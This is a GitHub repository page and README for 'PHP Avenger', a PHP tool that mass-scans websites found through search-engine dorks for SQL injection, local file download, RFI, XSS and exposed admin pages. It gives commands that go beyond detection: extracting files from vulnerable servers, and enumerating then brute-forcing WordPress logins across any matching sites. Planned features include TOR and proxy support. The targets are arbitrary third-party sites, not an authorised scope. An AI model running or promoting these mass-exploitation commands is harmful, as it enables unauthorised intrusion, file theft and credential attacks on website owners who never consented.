Skip to content
Project for finding vunerabilities in mass.
Branch: master
Clone or download
Latest commit e4fc60e Jun 2, 2017
Type Name Latest commit message Commit time
Failed to load latest commit information.
bin add a phar file Oct 21, 2016
config init project again Sep 20, 2016
doc init project again Sep 20, 2016
resource fix cs - psr Oct 19, 2016
results Delete a.txt Nov 22, 2016
src minor corrections Jun 2, 2017
.gitignore init project again Sep 20, 2016
LICENSE Adding license Oct 19, 2016 minor corrections Jun 2, 2017
avenger init project again Sep 20, 2016
box.json add a phar file Oct 21, 2016
composer.json minor corrections - update Jun 2, 2017

PHP Avenger

PHP Avenger is a modern collection of open source tools written in PHP with focus in security and hacking.


  • PHP Avenger sh ( Search Engine )

Future Implementation

  • PHP Avenger bt ( Brute - Force )
  • PHP Avenger sca ( State Code Analyse )
  • PHP Avenger pwp ( Plugin WordPress )
  • PHP Avenger cj ( Component Joomla )

PHP Avenger SH

Php Avenger sh is a open source tool with an idea based in a fork inurlbr by Cleiton Pinheiro. Basically PHP Avenger sh is a tool that automates the process of detecting possible vulnerabilities using mass scan and checking if the vulnerability is true or false. Php Avenger uses search engines like google, bing and others through dorks ( advanced search ).


The recommended way to install PHP Avenger is through Composer.

# Install Composer
curl -sS | php

Next, run the Composer command to install the latest beta version of Php Avenger SH:

php composer.phar create-project aszone/avenger-sh
cd avenger-sh

Basic Usage

Use the commands bellow to init the process, results will be printed in the monitor and saved in a .txt file on folder results.

Get trash search

php avenger sh --dork=" ext:sql password"

Result of trash search

alt tag

Check Sql Injection

php avenger sh --dork=" inurl:php?id=" --check="sqli"

Result of Sql Injection

alt tag alt tag

Check Local File Download

php avenger sh --dork=" inurl:download.php?file=" --check="lfd"

Result of Local File Download

alt tag

Check and Exploited Local File Download

This next command you will check vulnerabilities and extract files of server. The files will save in /results/exploits/lfd/

php avenger sh --dork=" inurl:download.php?file=" --check="lfd" --exploit="lfd"

Result of Extract Files

alt tag

Video of Extract Files

Video of extract files

Check is Admin Page

php avenger sh --dork=" inurl:admin" --check="isAdmin"

Check is Admin Page and if Admin Page for WordPress get all users and start brute force

php avenger sh --dork="site:com inurl:wp-content/uploads" --check="isAdmin" --exploit="btwp"

Help for commands

php avenger sh


Search Engines

  • Google
  • GoogleApi
  • Bing
  • DuckDuckGo
  • Yahoo
  • Yandex

Covered Vulnerabilities

  • Sql Injection (SQLI)
  • Local File Download (LFD)
  • Admin Page
  • Remote File Inclusion (RFI)
  • Cross-Site-Scripting (XSS)

Covered Exploits

  • Local File Download (LFD)
  • Brute Force for WordPress

Covered Vulnerabilities in next versions

  • Sensitive Files
    • Dump Files
    • Config Files
    • Open Folders

Features under development

  • Power Search
  • Send E-mail with results
  • Naming the .txt result file
  • Proxys
    • TOR
    • Site of Proxys
    • Virgin Proxies

Help and docs

You can’t perform that action at this time.